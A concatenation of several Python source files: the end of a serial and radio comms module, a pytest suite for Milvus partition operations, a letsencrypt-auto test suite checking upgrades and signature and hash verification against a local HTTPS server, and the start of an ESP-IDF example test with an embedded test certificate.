return buffer, index, data_length_decrement
def comms_init(port, baud_rate):
""" Initialise CommsHandler class instance , set COM Port and baud rate, start rx_listener Thread. """
global comms_handler
if comms_handler is not CommsHandler:
comms_handler = CommsHandler(port, baud_rate)
comms_handler.rx_state_machine.start()
if RaspberryPi is True:
GPIO.setmode(GPIO.BCM)
GPIO.setup(DIO0_GPIO, GPIO.IN, pull_up_down=GPIO.PUD_OFF)
GPIO.add_event_detect(DIO0_GPIO, GPIO.RISING,
callback=comms_handler.radio.rx_interrupt, bouncetime=100)
signal.signal(signal.SIGINT, signal_handler)
def comms_send(data):
""" Send data over the COM Port"""
global comms_handler
if config.COMMS == "RF69" and RaspberryPi is True:
comms_handler.radio.send(data)
elif config.COMMS == "SERIAL":
comms_handler.serial.send(data)
def change_baud_rate(requested_baud_rate):
""" Change baud rate to requested rate """
global comms_handler
comms_handler.serial.baudrate = comms_handler.comms.check_baud_rate(requested_baud_rate)
def flush_com_port():
global comms_handler
comms_handler.serial.reset_output_buffer()
def change_com_port(port):
global comms_handler
comms_handler.serial.close()
comms_handler.serial.port = port
config.COM_PORT = port
try:
comms_handler.serial.open()
except serial.serialutil.SerialException as err:
print(repr(err))
|
test_partition_20.py | import threading
import pytest
from base.partition_wrapper import ApiPartitionWrapper
from base.client_base import TestcaseBase
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from common.code_mapping import PartitionErrorMessage
prefix = "partition_"
class TestPartitionParams(TestcaseBase):
""" Test case of partition interface in parameters"""
@pytest.mark.tags(CaseLabel.L0)
def test_partition_default(self):
"""
target: verify create a partition
method: create a partition
expected: create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
description = cf.gen_unique_str("desc_")
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
# check that the partition has been created
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [""])
def test_partition_empty_name(self, partition_name):
"""
target: verify create a partition with empty name
method: create a partition with empty name
expected: raise exception
"""
# create a collection
collection_w = self.init_collection_wrap()
# create partition
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "Partition name should not be empty"})
@pytest.mark.tags(CaseLabel.L1)
def test_partition_empty_description(self):
"""
target: verify create a partition with empty description
method: create a partition with empty description
expected: create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# init partition
partition_name = cf.gen_unique_str(prefix)
description = ""
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
# check that the partition has been created
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
def test_partition_max_description_length(self):
"""
target: verify create a partition with 255 length name and 1024 length description
method: create a partition with 255 length name and 1024 length description
expected: create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# init partition
partition_name = cf.gen_str_by_length(255)
description = cf.gen_str_by_length(2048)
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True}
)
@pytest.mark.tags(CaseLabel.L1)
def test_partition_dup_name(self):
"""
target: verify create partitions with duplicate names
method: create partitions with duplicate names
expected: 1. create successfully
2. the same partition returned with diff object ids
"""
# create a collection
collection_w = self.init_collection_wrap()
# create two partitions
partition_name = cf.gen_unique_str(prefix)
description = cf.gen_unique_str()
partition_w1 = self.init_partition_wrap(collection_w, partition_name, description)
partition_w2 = self.init_partition_wrap(collection_w, partition_name, description)
# public check func to be extracted
assert id(partition_w1.partition) != id(partition_w2.partition)
assert partition_w1.name == partition_w2.name
assert partition_w1.description == partition_w2.description
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("description", ct.get_invalid_strs)
def test_partition_special_chars_description(self, description):
"""
target: verify create a partition with special characters in description
method: create a partition with special characters in description
expected: create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L0)
def test_partition_default_name(self):
"""
target: verify create a partition with default name
method: 1. get the _default partition
2. create a partition with _default name
expected: the same partition returned
"""
# create collection
collection_w = self.init_collection_wrap()
# check that the default partition exists
assert collection_w.has_partition(ct.default_partition_name)[0]
# check that can get the _default partition
collection, _ = collection_w.partition(ct.default_partition_name)
# check that init the _default partition object
partition_w = self.init_partition_wrap(collection_w, ct.default_partition_name)
assert collection.name == partition_w.name
@pytest.mark.tags(CaseLabel.L1)
def test_partition_max_length_name(self):
"""
target: verify create a partition with max length(256) name
method: create a partition with max length name
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_str_by_length(256)
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, 'err_msg': "is illegal"}
)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", ct.get_invalid_strs)
def test_partition_invalid_name(self, partition_name):
"""
target: verify create a partition with invalid name
method: create a partition with invalid names
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, 'err_msg': "is illegal"}
)
# TODO: need an error code issue #5144 and assert independently
@pytest.mark.tags(CaseLabel.L1)
def test_partition_none_collection(self):
"""
target: verify create a partition with none collection
method: create a partition with none collection
expected: raise exception
"""
# create partition with collection is None
partition_name = cf.gen_unique_str(prefix)
self.partition_wrap.init_partition(collection=None, name=partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "must be pymilvus.Collection"})
@pytest.mark.tags(CaseLabel.L1)
def test_partition_drop(self):
"""
target: verify drop a partition in one collection
method: 1. create a partition in one collection
2. drop the partition
expected: drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
# check that the partition exists
assert collection_w.has_partition(partition_name)[0]
# drop partition
partition_w.drop()
# check that the partition not exists
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
def test_partition_release(self):
"""
target: verify release partition
method: 1. create a collection and two partitions
2. insert data into each partition
3. flush and load the both partitions
4. release partition1
5. release partition1 twice
expected: 1. the 1st partition is released
2. the 2nd partition is not released
"""
# create collection
collection_w = self.init_collection_wrap()
# create two partitions
partition_w1 = self.init_partition_wrap(collection_w)
partition_w2 = self.init_partition_wrap(collection_w)
# insert data to two partition
partition_w1.insert(cf.gen_default_list_data())
partition_w2.insert(cf.gen_default_list_data())
# load two partitions
partition_w1.load()
partition_w2.load()
# search two partitions
search_vectors = cf.gen_vectors(1, ct.default_dim)
res1, _ = partition_w1.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
res2, _ = partition_w2.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
assert len(res1) == 1 and len(res2) == 1
# release the first partition
partition_w1.release()
# check result
res1, _ = partition_w1.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1,
check_task=ct.CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "partitions have been released"})
res2, _ = partition_w2.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
assert len(res2) == 1
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("data", [cf.gen_default_dataframe_data(10),
cf.gen_default_list_data(10),
cf.gen_default_tuple_data(10)])
def test_partition_insert(self, data):
"""
target: verify insert entities multiple times
method: 1. create a collection and a partition
2. partition.insert(data)
3. insert data again
expected: insert data successfully
"""
nums = 10
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name,
"is_empty": True, "num_entities": 0}
)
# insert data
partition_w.insert(data)
# self._connect().flush([collection_w.name]) # don't need flush for issue #5737
assert not partition_w.is_empty
assert partition_w.num_entities == nums
# insert data
partition_w.insert(data)
# self._connect().flush([collection_w.name])
assert not partition_w.is_empty
assert partition_w.num_entities == (nums + nums)
class TestPartitionOperations(TestcaseBase):
""" Test case of partition interface in operations """
@pytest.mark.tags(CaseLabel.L1)
def test_partition_dropped_collection(self):
"""
target: verify create partition against a dropped collection
method: 1. create collection1
2. drop collection1
3. create partition in collection1
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# drop collection
collection_w.drop()
# create partition failed
self.partition_wrap.init_partition(collection_w.collection, cf.gen_unique_str(prefix),
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L2)
def test_partition_same_name_in_diff_collections(self):
"""
target: verify create partitions with same name in diff collections
method: 1. create a partition in collection1
2. create a partition in collection2
expected: create successfully
"""
# create two collections
collection_w1 = self.init_collection_wrap()
collection_w2 = self.init_collection_wrap()
# create 2 partitions in 2 diff collections
partition_name = cf.gen_unique_str(prefix)
self.init_partition_wrap(collection_wrap=collection_w1, name=partition_name)
self.init_partition_wrap(collection_wrap=collection_w2, name=partition_name)
# check result
assert collection_w1.has_partition(partition_name)[0]
assert collection_w2.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_partition_multi_partitions_in_collection(self):
"""
target: verify create multiple partitions in one collection
method: create multiple partitions in one collection
expected: create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
for _ in range(10):
partition_name = cf.gen_unique_str(prefix)
# create partition with different names and check the partition exists
self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason="skip temporarily for debug")
def test_partition_maximum_partitions(self):
"""
target: verify create maximum partitions
method: 1. create maximum partitions
2. create one more partition
expected: raise exception
"""
threads_num = 8
threads = []
def create_partition(collection, threads_n):
for _ in range(ct.max_partition_num // threads_n):
name = cf.gen_unique_str(prefix)
par_wrap = ApiPartitionWrapper()
par_wrap.init_partition(collection, name, check_task=CheckTasks.check_nothing)
collection_w = self.init_collection_wrap()
for _ in range(threads_num):
t = threading.Thread(target=create_partition, args=(collection_w.collection, threads_num))
threads.append(t)
t.start()
for t in threads:
t.join()
p_name = cf.gen_unique_str()
self.partition_wrap.init_partition(
collection_w.collection, p_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "maximum partition's number should be limit to 4096"})
@pytest.mark.tags(CaseLabel.L0)
def test_partition_drop_default_partition(self):
"""
target: verify drop the _default partition
method: drop the _default partition
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# get the default partition
default_partition, _ = collection_w.partition(ct.default_partition_name)
partition_w = self.init_partition_wrap(collection_w, ct.default_partition_name)
assert default_partition.name == partition_w.name
# verify that drop partition with error
partition_w.drop(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "default partition cannot be deleted"})
@pytest.mark.tags(CaseLabel.L1)
def test_partition_drop_partition_twice(self):
"""
target: verify drop the same partition twice
method: 1.create a partition with default schema
2. drop the partition
3. drop the same partition again
expected: raise exception when 2nd time
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
collection_w.has_partition(partition_name)
# drop partition
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
# verify that drop the partition again with exception
partition_w.drop(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: PartitionErrorMessage.PartitionNotExist})
@pytest.mark.tags(CaseLabel.L2)
def test_partition_create_and_drop_multi_times(self):
"""
target: verify create and drop for times
method: 1.create a partition with default schema
2. drop the partition
3. loop #1 and #2 for times
expected: create and drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# range for 5 times
partition_name = cf.gen_unique_str(prefix)
for i in range(5):
# create partition and check that the partition exists
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# drop partition and check that the partition not exists
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_partition_drop_non_empty_partition(self):
"""
target: verify drop a partition which has data inserted
method: 1.create a partition with default schema
2. insert some data
3. drop the partition
expected: drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# insert data to partition
partition_w.insert(cf.gen_default_dataframe_data())
# drop partition
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("data", [cf.gen_default_list_data(nb=3000)])
@pytest.mark.parametrize("index_param", cf.gen_simple_index())
def test_partition_drop_indexed_partition(self, data, index_param):
"""
target: verify drop an indexed partition
method: 1. create a partition
2. insert same data
3. create an index
5. drop the partition
expected: drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# insert data to partition
ins_res, _ = partition_w.insert(data)
assert len(ins_res.primary_keys) == len(data[0])
# create index of collection
collection_w.create_index(ct.default_float_vec_field_name, index_param)
# drop partition
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
def test_partition_release_empty_partition(self):
"""
target: verify release an empty partition
method: 1. create a partition
2. release the partition
expected: release successfully
"""
# create partition
partition_w = self.init_partition_wrap()
assert partition_w.is_empty
# release partition
partition_w.release()
# TODO: assert no more memory consumed
@pytest.mark.tags(CaseLabel.L1)
def test_partition_release_dropped_partition(self):
"""
target: verify release a dropped partition
method: 1. create a partition
2. drop the partition
3. release the partition
expected: raise exception
"""
# create partition
partition_w = self.init_partition_wrap()
# drop partition
partition_w.drop()
# release the dropped partition and check err response
partition_w.release(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: PartitionErrorMessage.PartitionNotExist})
@pytest.mark.tags(CaseLabel.L1)
def test_partition_release_dropped_collection(self):
"""
target: verify release a dropped collection
method: 1. create a collection and partition
2. drop the collection
3. release the partition
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# drop collection
collection_w.drop()
# release the partition and check err response
partition_w.release(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L1)
def test_partition_release_after_collection_released(self):
"""
target: verify release a partition after the collection released
method: 1. create a collection and partition
2. insert some data
3. release the collection
4. release the partition
expected: partition released successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# insert data to partition
data = cf.gen_default_list_data()
partition_w.insert(data)
assert partition_w.num_entities == len(data[0])
assert collection_w.num_entities == len(data[0])
# load partition
partition_w.load()
# search of partition
search_vectors = cf.gen_vectors(1, ct.default_dim)
res_1, _ = partition_w.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
assert len(res_1) == 1
# release collection
collection_w.release()
# search of partition
res_2, _ = partition_w.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1,
check_task=ct.CheckTasks.err_res,
check_items={ct.err_code: 0,
ct.err_msg: "not loaded into memory"})
# release partition
partition_w.release()
@pytest.mark.tags(CaseLabel.L1)
def test_partition_insert_default_partition(self):
"""
target: verify insert data into _default partition
method: 1. create a collection
2. insert some data into _default partition
expected: insert successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# get the default partition
partition_name = ct.default_partition_name
assert collection_w.has_partition(partition_name)[0]
partition_w = self.init_partition_wrap(collection_w, partition_name)
# insert data to partition
data = cf.gen_default_dataframe_data()
partition_w.insert(data)
# self._connect().flush([collection_w.name])
assert partition_w.num_entities == len(data)
@pytest.mark.tags(CaseLabel.L1)
def test_partition_insert_dropped_partition(self):
"""
target: verify insert data into a dropped partition
method: 1. create a collection
2. insert some data into a dropped partition
expected: raise exception
"""
# create partition
partition_w = self.init_partition_wrap()
# drop partition
partition_w.drop()
# insert data to partition
partition_w.insert(cf.gen_default_dataframe_data(),
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Partition not exist"})
# TODO: update the assert error
@pytest.mark.tags(CaseLabel.L1)
def test_partition_insert_dropped_collection(self):
"""
target: verify insert data into a dropped collection
method: 1. create a collection
2. insert some data into a dropped collection
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# drop collection
collection_w.drop()
# insert data to partition
partition_w.insert(cf.gen_default_dataframe_data(),
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "None Type"})
@pytest.mark.tags(CaseLabel.L2)
def test_partition_insert_maximum_size_data(self):
"""
target: verify insert maximum size data(256M?) a time
method: 1. create a partition
2. insert maximum size data
expected: insert successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w)
# insert data to partition
max_size = 100000 # TODO: clarify the max size of data
ins_res, _ = partition_w.insert(cf.gen_default_dataframe_data(max_size), timeout=40)
assert len(ins_res.primary_keys) == max_size
# self._connect().flush([collection_w.name])
assert partition_w.num_entities == max_size
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dim", [ct.default_dim - 1, ct.default_dim + 1])
def test_partition_insert_mismatched_dimensions(self, dim):
"""
target: verify insert maximum size data(256M?) a time
method: 1. create a collection with default dim
2. insert dismatch dim data
expected: raise exception
"""
# create partition
partition_w = self.init_partition_wrap()
data = cf.gen_default_list_data(nb=10, dim=dim)
# insert data to partition
partition_w.insert(data, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "but entities field dim"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("sync", [True, False])
def test_partition_insert_sync(self, sync):
"""
target: verify insert sync
method: 1. create a partition
2. insert data in sync
expected: insert successfully
"""
pass
|
auto_test.py | """Tests for letsencrypt-auto"""
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from contextlib import contextmanager
from functools import partial
from json import dumps
from os import chmod, environ
from os.path import abspath, dirname, exists, join
import re
from shutil import copy, rmtree
import socket
import ssl
from stat import S_IRUSR, S_IXUSR
from subprocess import CalledProcessError, Popen, PIPE
import sys
from tempfile import mkdtemp
from threading import Thread
from unittest import TestCase
from nose.tools import eq_, nottest, ok_
@nottest
def tests_dir():
"""Return a path to the "tests" directory."""
return dirname(abspath(__file__))
sys.path.insert(0, dirname(tests_dir()))
from build import build as build_le_auto
class RequestHandler(BaseHTTPRequestHandler):
"""An HTTPS request handler which is quiet and serves a specific folder."""
def __init__(self, resources, *args, **kwargs):
"""
:arg resources: A dict of resource paths pointing to content bytes
"""
self.resources = resources
BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def log_message(self, format, *args):
"""Don't log each request to the terminal."""
def do_GET(self):
"""Serve a GET request."""
content = self.send_head()
if content is not None:
self.wfile.write(content)
def send_head(self):
"""Common code for GET and HEAD commands
This sends the response code and MIME headers and returns either a
bytestring of content or, if none is found, None.
"""
path = self.path[1:] # Strip leading slash.
content = self.resources.get(path)
if content is None:
self.send_error(404, 'Path "%s" not found in self.resources' % path)
else:
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.send_header('Content-Length', str(len(content)))
self.end_headers()
return content
def server_and_port(resources):
"""Return an unstarted HTTPS server and the port it will use."""
# Find a port, and bind to it. I can't get the OS to close the socket
# promptly after we shut down the server, so we typically need to try
# a couple ports after the first test case. Setting
# TCPServer.allow_reuse_address = True seems to have nothing to do
# with this behavior.
worked = False
for port in xrange(4443, 4543):
try:
server = HTTPServer(('localhost', port),
partial(RequestHandler, resources))
except socket.error:
pass
else:
worked = True
server.socket = ssl.wrap_socket(
server.socket,
certfile=join(tests_dir(), 'certs', 'localhost', 'server.pem'),
server_side=True)
break
if not worked:
raise RuntimeError("Couldn't find an unused socket for the testing HTTPS server.")
return server, port
@contextmanager
def serving(resources):
"""Spin up a local HTTPS server, and yield its base URL.
Use a self-signed cert generated as outlined by
https://coolaj86.com/articles/create-your-own-certificate-authority-for-
testing/.
"""
server, port = server_and_port(resources)
thread = Thread(target=server.serve_forever)
try:
thread.start()
yield 'https://localhost:{port}/'.format(port=port)
finally:
server.shutdown()
thread.join()
LE_AUTO_PATH = join(dirname(tests_dir()), 'letsencrypt-auto')
@contextmanager
def ephemeral_dir():
dir = mkdtemp(prefix='le-test-')
try:
yield dir
finally:
rmtree(dir)
def out_and_err(command, input=None, shell=False, env=None):
"""Run a shell command, and return stderr and stdout as string.
If the command returns nonzero, raise CalledProcessError.
:arg command: A list of commandline args
:arg input: Data to pipe to stdin. Omit for none.
Remaining args have the same meaning as for Popen.
"""
process = Popen(command,
stdout=PIPE,
stdin=PIPE,
stderr=PIPE,
shell=shell,
env=env)
out, err = process.communicate(input=input)
status = process.poll() # same as in check_output(), though wait() sounds better
if status:
error = CalledProcessError(status, command)
error.output = out
raise error
return out, err
def signed(content, private_key_name='signing.key'):
"""Return the signed SHA-256 hash of ``content``, using the given key file."""
command = ['openssl', 'dgst', '-sha256', '-sign',
join(tests_dir(), private_key_name)]
out, err = out_and_err(command, input=content)
return out
def install_le_auto(contents, venv_dir):
"""Install some given source code as the letsencrypt-auto script at the
root level of a virtualenv.
:arg contents: The contents of the built letsencrypt-auto script
:arg venv_dir: The path under which to install the script
"""
venv_le_auto_path = join(venv_dir, 'letsencrypt-auto')
with open(venv_le_auto_path, 'w') as le_auto:
le_auto.write(contents)
chmod(venv_le_auto_path, S_IRUSR | S_IXUSR)
def run_le_auto(venv_dir, base_url, **kwargs):
"""Run the prebuilt version of letsencrypt-auto, returning stdout and
stderr strings.
If the command returns other than 0, raise CalledProcessError.
"""
env = environ.copy()
d = dict(XDG_DATA_HOME=venv_dir,
# URL to PyPI-style JSON that tell us the latest released version
# of LE:
LE_AUTO_JSON_URL=base_url + 'certbot/json',
# URL to dir containing letsencrypt-auto and letsencrypt-auto.sig:
LE_AUTO_DIR_TEMPLATE=base_url + '%s/',
# The public key corresponding to signing.key:
LE_AUTO_PUBLIC_KEY="""-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsMoSzLYQ7E1sdSOkwelg
tzKIh2qi3bpXuYtcfFC0XrvWig071NwIj+dZiT0OLZ2hPispEH0B7ISuuWg1ll7G
hFW0VdbxL6JdGzS2ShNWkX9hE9z+j8VqwDPOBn3ZHm03qwpYkBDwQib3KqOdYbTT
uUtJmmGcuk3a9Aq/sCT6DdfmTSdP5asdQYwIcaQreDrOosaS84DTWI3IU+UYJVgl
LsIVPBuy9IcgHidUQ96hJnoPsDCWsHwX62495QKEarauyKQrJzFes0EY95orDM47
Z5o/NDiQB11m91yNB0MmPYY9QSbnOA9j7IaaC97AwRLuwXY+/R2ablTcxurWou68
iQIDAQAB
-----END PUBLIC KEY-----""",
**kwargs)
env.update(d)
return out_and_err(
join(venv_dir, 'letsencrypt-auto') + ' --version',
shell=True,
env=env)
def set_le_script_version(venv_dir, version):
"""Tell the letsencrypt script to report a certain version.
We actually replace the script with a dummy version that knows only how to
print its version.
"""
with open(join(venv_dir, 'letsencrypt', 'bin', 'letsencrypt'), 'w') as script:
script.write("#!/usr/bin/env python\n"
"from sys import stderr\n"
"stderr.write('letsencrypt %s\\n')" % version)
class AutoTests(TestCase):
"""Test the major branch points of letsencrypt-auto:
* An le-auto upgrade is needed.
* An le-auto upgrade is not needed.
* There was an out-of-date LE script installed.
* There was a current LE script installed.
* There was no LE script installed (less important).
* Pip hash-verification passes.
* Pip has a hash mismatch.
* The OpenSSL sig matches.
* The OpenSSL sig mismatches.
For tests which get to the end, we run merely ``letsencrypt --version``.
The functioning of the rest of the certbot script is covered by other
test suites.
"""
def test_successes(self):
"""Exercise most branches of letsencrypt-auto.
They just happen to be the branches in which everything goes well.
I violate my usual rule of having small, decoupled tests, because...
1. We shouldn't need to run a Cartesian product of the branches: the
phases run in separate shell processes, containing state leakage
pretty effectively. The only shared state is FS state, and it's
limited to a temp dir, assuming (if we dare) all functions properly.
2. One combination of branches happens to set us up nicely for testing
the next, saving code.
"""
NEW_LE_AUTO = build_le_auto(
version='99.9.9',
requirements='letsencrypt==99.9.9 --hash=sha256:1cc14d61ab424cdee446f51e50f1123f8482ec740587fe78626c933bba2873a0')
NEW_LE_AUTO_SIG = signed(NEW_LE_AUTO)
with ephemeral_dir() as venv_dir:
# This serves a PyPI page with a higher version, a GitHub-alike
# with a corresponding le-auto script, and a matching signature.
resources = {'certbot/json': dumps({'releases': {'99.9.9': None}}),
'v99.9.9/letsencrypt-auto': NEW_LE_AUTO,
'v99.9.9/letsencrypt-auto.sig': NEW_LE_AUTO_SIG}
with serving(resources) as base_url:
run_letsencrypt_auto = partial(
run_le_auto,
venv_dir,
base_url,
PIP_FIND_LINKS=join(tests_dir(),
'fake-letsencrypt',
'dist'))
# Test when a phase-1 upgrade is needed, there's no LE binary
# installed, and pip hashes verify:
install_le_auto(build_le_auto(version='50.0.0'), venv_dir)
out, err = run_letsencrypt_auto()
ok_(re.match(r'letsencrypt \d+\.\d+\.\d+',
err.strip().splitlines()[-1]))
# Make a few assertions to test the validity of the next tests:
self.assertIn('Upgrading certbot-auto ', out)
self.assertIn('Creating virtual environment...', out)
# Now we have le-auto 99.9.9 and LE 99.9.9 installed. This
# conveniently sets us up to test the next 2 cases.
# Test when neither phase-1 upgrade nor phase-2 upgrade is
# needed (probably a common case):
out, err = run_letsencrypt_auto()
self.assertNotIn('Upgrading certbot-auto ', out)
self.assertNotIn('Creating virtual environment...', out)
# Test when a phase-1 upgrade is not needed but a phase-2
# upgrade is:
set_le_script_version(venv_dir, '0.0.1')
out, err = run_letsencrypt_auto()
self.assertNotIn('Upgrading certbot-auto ', out)
self.assertIn('Creating virtual environment...', out)
def test_openssl_failure(self):
"""Make sure we stop if the openssl signature check fails."""
with ephemeral_dir() as venv_dir:
# Serve an unrelated hash signed with the good key (easier than
# making a bad key, and a mismatch is a mismatch):
resources = {'': '<a href="certbot/">certbot/</a>',
'certbot/json': dumps({'releases': {'99.9.9': None}}),
'v99.9.9/letsencrypt-auto': build_le_auto(version='99.9.9'),
'v99.9.9/letsencrypt-auto.sig': signed('something else')}
with serving(resources) as base_url:
copy(LE_AUTO_PATH, venv_dir)
try:
out, err = run_le_auto(venv_dir, base_url)
except CalledProcessError as exc:
eq_(exc.returncode, 1)
self.assertIn("Couldn't verify signature of downloaded "
"certbot-auto.",
exc.output)
else:
self.fail('Signature check on certbot-auto erroneously passed.')
def test_pip_failure(self):
"""Make sure pip stops us if there is a hash mismatch."""
with ephemeral_dir() as venv_dir:
resources = {'': '<a href="certbot/">certbot/</a>',
'certbot/json': dumps({'releases': {'99.9.9': None}})}
with serving(resources) as base_url:
# Build a le-auto script embedding a bad requirements file:
install_le_auto(
build_le_auto(
version='99.9.9',
requirements='configobj==5.0.6 --hash=sha256:badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadb'),
venv_dir)
try:
out, err = run_le_auto(venv_dir, base_url)
except CalledProcessError as exc:
eq_(exc.returncode, 1)
self.assertIn("THESE PACKAGES DO NOT MATCH THE HASHES "
"FROM THE REQUIREMENTS FILE",
exc.output)
ok_(not exists(join(venv_dir, 'letsencrypt')),
msg="The virtualenv was left around, even though "
"installation didn't succeed. We shouldn't do "
"this, as it foils our detection of whether we "
"need to recreate the virtualenv, which hinges "
"on the presence of $VENV_BIN/letsencrypt.")
else:
self.fail("Pip didn't detect a bad hash and stop the "
"installation.")
|
example_test.py | import http.server
import multiprocessing
import os
import random
import re
import socket
import ssl
import struct
import subprocess
import ttfw_idf
from tiny_test_fw import DUT
server_cert = '-----BEGIN CERTIFICATE-----\n' \
'MIIDWDCCAkACCQCbF4+gVh/MLjANBgkqhkiG9w0BAQsFADBuMQswCQYDVQQGEwJJ\n'\
'TjELMAkGA1UECAwCTUgxDDAKBgNVBAcMA1BVTjEMMAoGA1UECgwDRVNQMQwwCgYD\n'\
'VQQLDANFU1AxDDAKBgNVBAMMA0VTUDEaMBgGCSqGSIb3DQEJARYLZXNwQGVzcC5j\n'\
'b20wHhcNMjEwNzEyMTIzNjI3WhcNNDEwNzA3MTIzNjI3WjBuMQswCQYDVQQGEwJJ\n'\
'TjELMAkGA1UECAwCTUgxDDAKBgNVBAcMA1BVTjEMMAoGA1UECgwDRVNQMQwwCgYD\n'\
